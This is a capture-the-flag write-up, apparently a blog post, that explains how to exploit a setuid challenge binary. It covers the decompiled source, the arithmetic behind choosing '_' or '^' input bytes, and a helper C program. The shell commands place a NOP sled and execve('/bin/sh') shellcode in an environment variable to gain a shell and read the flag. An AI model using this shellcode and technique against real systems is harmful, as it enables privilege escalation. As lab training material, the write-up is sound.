Here we are given SSH credentials to a box where we need to exploit a setuid binary that reads the flag.
Summary: craft an input file that makes the program jump to the stack.
Let's decompile the binary:
```c
#include <stdio.h>
#include <string.h>

/* Global buffer the decompiler referenced as `test`; declared here so the
 * listing compiles. Its exact size in the original binary is unknown. */
static char test[0x12];

int func(void)
{
    puts("func");
    return 0;
}

int main(int argc, char *argv[])
{
    char s[12];
    memset(s, 0x90u, 0x12u);                 /* note: writes 18 bytes into a 12-byte buffer */
    FILE *stream = fopen(argv[1], "r");
    if (stream) {
        int nread = fread(s, 1u, 0xCu, stream); /* exactly 12 bytes are read */
        if (nread == 12) {
            fclose(stream);
            void (*ptr)(void) = func;        /* 0x08048540 */
            unsigned int b4 = (s[4] | 1) ^ 0xE0;
            unsigned int b3 = (s[1] | 1) ^ 0xE0;
            b3 <<= 16;
            b4 <<= 24;
            strncpy(test, s, 0x12u);         /* ??? */
            ptr = (void (*)(void))(b4 | b3 | (unsigned int)ptr);
            ptr();
            return 0;
        }
    }
    return 1;
}
```
The algorithm is simple: 12 bytes are read from the file named by argv[1], and the 2nd and 5th of them (s[1] and s[4]) are transformed into the two high bytes that get OR'ed into ptr, which is then called. The low 16 bits of ptr stay whatever func's address gives us (0x8540).
The stack here is executable, so it's straightforward: we make ptr point into the stack, where our payload lives.
The stack addresses here look like 0xbfbfXXXX, so each controlled byte must come out as 0xBF. The binary computes (c | 1) ^ 0xE0, so we need c | 1 == 0x5F, which leaves two choices:
0x5F = '_' (0x5F | 1 = 0x5F, and 0x5F ^ 0xE0 = 0xBF)
or
0x5E = '^' (0x5E | 1 = 0x5F as well)
So, if we put twelve "_" (or "^") into a file, ptr becomes 0xbfbf0000 | 0x08048540 = 0xbfbf8540 and that is where we jump.
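As an added worked example (not part of the original writeup or the challenge binary), the snippet below reproduces the binary's pointer arithmetic and then searches for printable input bytes that produce a wanted high byte, so you can confirm that '_' and '^' are the only printable options for 0xBF and see which targets are unreachable. FUNC_ADDR is taken from the listing above; the function names are my own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example: not the challenge's own code. */
#define FUNC_ADDR 0x08048540u /* address of func() from the decompiled listing */

/* The binary's transformation of one input byte into one address byte. */
static uint32_t xform(unsigned char c) {
    return ((uint32_t)(c | 1)) ^ 0xE0u;
}

/* ptr = (b4 << 24) | (b3 << 16) | func, exactly as the binary builds it.
 * s1 is the 2nd input byte (s[1]), s4 is the 5th (s[4]). */
uint32_t compute_target(unsigned char s1, unsigned char s4, uint32_t func_addr) {
    uint32_t b3 = xform(s1) << 16;
    uint32_t b4 = xform(s4) << 24;
    return b4 | b3 | func_addr;
}

/* Count printable bytes (0x20..0x7E) that map to `want`; store up to `max`
 * of them in out[] (out may be NULL when max is 0). */
size_t find_bytes(unsigned char want, unsigned char *out, size_t max) {
    size_t n = 0;
    for (int c = 0x20; c < 0x7F; c++) {
        if (xform((unsigned char)c) == want) {
            if (n < max) out[n] = (unsigned char)c;
            n++;
        }
    }
    return n;
}

/* idx-th printable candidate for `want`, or -1 if there is none. */
int byte_for(unsigned char want, size_t idx) {
    unsigned char cand[16];
    size_t n = find_bytes(want, cand, sizeof cand);
    return idx < n ? cand[idx] : -1;
}

/* Build the 12-byte input file contents. Only positions 1 and 4 matter;
 * filling all twelve with the same byte is what the writeup does. */
void build_input(unsigned char c, unsigned char buf[12]) {
    memset(buf, c, 12);
}

int main(void) {
    unsigned char cand[8];
    size_t n = find_bytes(0xBF, cand, sizeof cand);
    printf("printable bytes giving 0xBF:");
    for (size_t i = 0; i < n; i++) printf(" 0x%02x '%c'", cand[i], cand[i]);
    printf("\n");

    unsigned char in[12];
    build_input('_', in);
    printf("ptr = 0x%08x\n", compute_target(in[1], in[4], FUNC_ADDR));

    /* Write the input file the binary expects (12 bytes). */
    FILE *f = fopen("test", "wb");
    if (f) { fwrite(in, 1, sizeof in, f); fclose(f); }
    return 0;
}
```

Running it prints the two candidates and `ptr = 0xbfbf8540`; trying other high bytes (for example 0x08, which would need an input byte of 0xE8 or 0xE9) shows why a return into the binary itself is not reachable with printable input, so the executable stack is the practical target.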
Then we put that into a file and place a huge NOP sled with shellcode on the stack through an environment variable. Since only the two high bytes of ptr are under our control and the low 16 bits are fixed at 0x8540, the sled has to be large enough that 0xbfbf8540 lands somewhere inside it. The shellcode is a BSD-style execve("/bin/sh") (syscall 0x3b with its arguments on the stack):
```sh
$ mkdir /tmp/solve
$ cd /tmp/solve
$ export SC="`perl -e 'print "\x90"x100000 . "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2\x52\x57\x54\xb0\x3b\xcd\x80\xe8\xee\xff\xff\xff/bin/sh";'`"
$ echo '^^^^^^^^^^^^^^^^^^^^^^^' >test
$ ~/X ./test
$ cat ~/password
key_is_The_davinci_cod3_!
```
The flag: key_is_The_davinci_cod3_!
2 comments
What tools do you use to decompile a binary?
Author
You can use IDA with Hex-Rays ;) And some manual fixing